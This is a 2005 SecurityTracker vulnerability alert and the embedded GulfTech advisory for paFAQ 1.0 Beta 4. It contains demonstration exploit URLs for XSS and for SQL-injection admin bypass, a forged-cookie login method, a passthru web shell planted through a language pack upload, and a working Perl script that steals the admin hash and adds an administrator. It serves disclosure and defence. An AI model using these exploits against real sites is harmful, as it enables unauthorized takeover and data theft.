SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Generic)  >   paFAQ Vendors:   PHP Arena
paFAQ Flaws Let Remote Users Download the Database, Inject SQL Commands, Conduct Cross-Site Scripting Attacks, and Execute Arbitrary Code
SecurityTracker Alert ID:  1014248
SecurityTracker URL:  http://securitytracker.com/id/1014248
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Jun 21 2005
Impact:   Disclosure of authentication information, Disclosure of system information, Disclosure of user information, Execution of arbitrary code via network, Modification of user information, User access via network

Version(s): 1.0 Beta 4
Description:   Several vulnerabilities were reported in paFAQ. A remote user can conduct cross-site scripting attacks. A remote user can inject SQL commands to gain administrative access. A remote user can download the database and then gain administrative access. A remote authenticated administrator can execute arbitrary code on the target system.

Several scripts do not properly validate user-supplied input to filter HTML code before displaying the input. A remote user can create a specially crafted URL that, when loaded by a target user, will cause arbitrary scripting code to be executed by the target user's browser. The code will originate from the site running the paFAQ software and will run in the security context of that site. As a result, the code will be able to access the target user's cookies (including authentication cookies), if any, associated with the site, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.

A demonstration exploit URL is provided:

http://[target]/index.php?act=Question&id=1%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E

If magic quotes gpc is set to be off a remote user can inject SQL commands. This can be exploited, for example, to gain administrative access to the target application. A demonstration exploit URL is provided:

http://[target]/admin/index.php?act=login&username='%20UNION%20SELECT%20id,name,
'3858f62230ac3c915f300c664312c63f',email,notify,permissions,session%20FROM%20
pafaq_admins%20WHERE%201/*&password=foobar

The 'id' parameter in most of the scripts is also affected.

A remote user can supply the following type of URL to download the entire database:

http://[target]/path/to/pafaq/admin/backup.php

With a copy of the database, a remote user can use the administrative username and hashed administrative password in a cookie ('pafaq_user' and 'pafaq_pass') to gain administrative access on the target system.

A remote authenticated administrator can upload arbitrary PHP scripting code in place of a language pack file and then have the web server execute the code. The code will run with the privileges of the target web service.

The vendor was notified without response.

James Bercegay of the GulfTech Security Research Team discovered this vulnerability.

The original advisory is available at:

http://www.gulftech.org/?node=research&article_id=00083-06202005

Impact:   A remote user can access the target user's cookies (including authentication cookies), if any, associated with the site running the paFAQ software, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.

A remote user can execute SQL commands on the underlying database.

A remote user can download the database and then gain administrative access.

A remote authenticated administrator can execute arbitrary code on the target system with the privileges of the target web service.

Solution:   No solution was available at the time of this entry.
Vendor URL:  www.phparena.net/pafaq.php (Links to External Site)
Cause:   Access control error, Input validation error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  paFaq Multiple Vulnerabilities


This is a multi-part message in MIME format.
--------------080902040703020805080705
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 7bit

##########################################################
# GulfTech Security Research           June 20th, 2005
##########################################################
# Vendor  : php Arena
# URL     : http://www.phparena.net/pafaq.php
# Version : paFAQ 1.0 Beta 4
# Risk    : Multiple Vulnerabilities
##########################################################



Description:
paFAQ is a FAQ/Knowledge base system that allows webmasters to
keep an organized database of Frequently Asked Questions; a
Knowledge Database for problems and solutions. There are a number
of vulnerabilities in paFaq. These vulnerabilities include
arbitrary unauthorized access to the entire paFaq database, as
well as admin authentication bypass, sql injection, arbitrary
code execution and cross site scripting. An attacker can gain a
remote shell on a vulnerable system using these vulnerabilities.



Cross Site Scripting:
There are some cross site scripting issues in the paFaq software.
Majority of these cross site scripting issues stem from inputted
variables never being sanitized properly.

http:///pafaq/index.php?act=Question&id=1%3E%3Cscript%3Ealert%28
document.cookie%29%3C%2Fscript%3E

These vulnerabilities can be used to render hostile code in the
context of the victims browser, and in turn disclose sensitive
information to an attacker.



SQL Injection:
There are a number of SQL Injection vulnerabilities in paFaq,
but it should be noted that to exploit these issues magic quotes
gpc must be off. Also, magic quotes off seems to be the default
php.ini settings now so I do consider these issues fairly high
risk. The most serious of the SQL Injection issues lies in the
administrative login.

$username = $_REQUEST['username'];
$password = md5($_REQUEST['password']);

$q = $DB->query("SELECT * FROM " . $DB->obj['tbl_pre'] . "admins WHERE 
name = '" . $username . "'");
$r = $DB->fetch_row($q);

if ($r['password'] == $password) {

    $t = time();
    $DB->query("UPDATE " . $DB->obj['tbl_pre'] . "admins SET 
session='$t' WHERE id='".$r['id']."'");
    setcookie("pafaq_user", $username, time()+3600);
    setcookie("pafaq_pass", $password, time()+3600);

The variable $username is taken directly from the submitted login form
and executed in the query, so if magic quotes gpc is off an attacker can
use UNION SELECT to bypass admin authentication!

http://pafaq/admin/index.php?act=login&username='%20UNION%20SELECT%20id,name,
'3858f62230ac3c915f300c664312c63f',email,notify,permissions,session%20FROM%20
pafaq_admins%20WHERE%201/*&password=foobar

The query above uses a UNION SELECT to get the admin username, id, email etc
but we specify the password hash as the md5 encrypted value of the $password
variable. If the host is vulnerable then the above link will log an attacker
in as the first admin in the selected table. Additionally the "id" parameter
in most of the scripts are vulnerable to SQL Injection, and can be 
exploited
when magic quotes gpc is set to off.



Arbitrary Database Download:
A very dangerous vulnerability lies in paFaq that will allow for an attacker
to download the entire paFaq database. A user does not have to be logged in
to exploit this vulnerability either, thus making it that more dangerous.

http://path/to/pafaq/admin/backup.php

An attacker can then use the encrypted password hash to gain administrative
access, there is no need for an attacker to decrypt it.

Cookie: pafaq_user=USERNAMEHERE; pafaq_pass=PASSWORDHASH

By adding the above cookie with the required values taken from the 
downloaded
database an attacker now has admin access to the affected paFaq 
installation.



Arbitrary Code Execution:
Once an attacker has administrative access to the website he can execute any
arbitrary php code by taking advantage of the upload a language pack 
feature.
The script does check for a "valid" language pack, but if an attacker, for
example, takes the default en.php file in the language directory and adds a
simple passthru($_GET['cmd']) at the bottom of the page, and then 
uploads the
modified en.php after renaming it to something like pafaq.php as a new 
language
pack, will be able to execute shell commands on the affected webserver 
by calling
the malicious script in the /lang/ directory. Example 
/lang/pafaq.php?cmd=id;pwd



Solution:
The developers were contacted and never responded. A quick workaround 
would be
to delete the backup.php script, and turn magic quotes gpc on, or better 
yet
use a more secure application if deployed live on the web.



Related Info:
The original advisory can be found at the following location
http://www.gulftech.org/?node=research&article_id=00083-06202005



Credits:
James Bercegay of the GulfTech Security Research Team

--------------080902040703020805080705
Content-Type: text/plain;
 name="pafaq.pl"
Content-Transfer-Encoding: 7bit
Content-Disposition: inline;
 filename="pafaq.pl"

#!/usr/bin/perl -w
##########################################################################
# paFaq 1.0 Add Administrator PoC // By James // http://www.gulftech.org
##########################################################################

use LWP::UserAgent;

# Set up the LWP User Agent
$ua = new LWP::UserAgent;
$ua->agent("paFaq Hash Grabber v1.0");

if ( !$ARGV[0] ) { print "Usage : pafaq.pl http://path/to/pafaq"; exit; }

my $key_time = time();

my $dbm_path = $ARGV[0] . '/admin/backup.php';
my $add_user = 'pafaq'; # change this?
my $add_pass = 'pafaq'; # change this?
my $add_email = 'pafaq@dev.null'; # change this?
my $add_path = $ARGV[0] . '/admin/index.php?area=users&act=doadd&name=' . $add_user . '&password=' . $add_pass . '&email=' . $add_email
 . '&notify=1&can_edit_settings=1&can_edit_admins=1&can_add_admins=1&can_del_admins=1&is_a_admin=1';

print "[*] Trying Host " . $ARGV[0] . "\n";

my $dbm = $ua->get($dbm_path);

if ( $dbm->content =~ /'([0-9]{1,8})',\s'(.*)',\s'([a-f0-9]{32})'/i)
{
	print "[+] User ID Is " . $1 . "\n";
	print "[+] User Name Is " . $2 . "\n";
	print "[+] User Password Is " . $3 . "\n";
	print "[*] Trying to add new user ...\n";
	
	my @cookie = ('Cookie' => 'pafaq_user=' . $2 . '; pafaq_pass=' . $3);
	my $add = $ua->get($add_path, @cookie);
	
	if ( $add->content =~ /has been created successfully/ )
	{
		print "[+] User $add_user Added Successfully!\n";
		print "[+] User Password Is $add_pass\n";		
	}
	else
	{
		print "[!] Unable To Add User! Maybe the username is already taken? ...\n";
		print "[!] Shutting Down ...\n";
		exit;	
	}
}
else
{
	print "[!] The Host Is Not Vulnerable ...\n";
	print "[!] Shutting Down ...\n";
	exit;
}
exit;

--------------080902040703020805080705--

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2021, SecurityGlobal.net LLC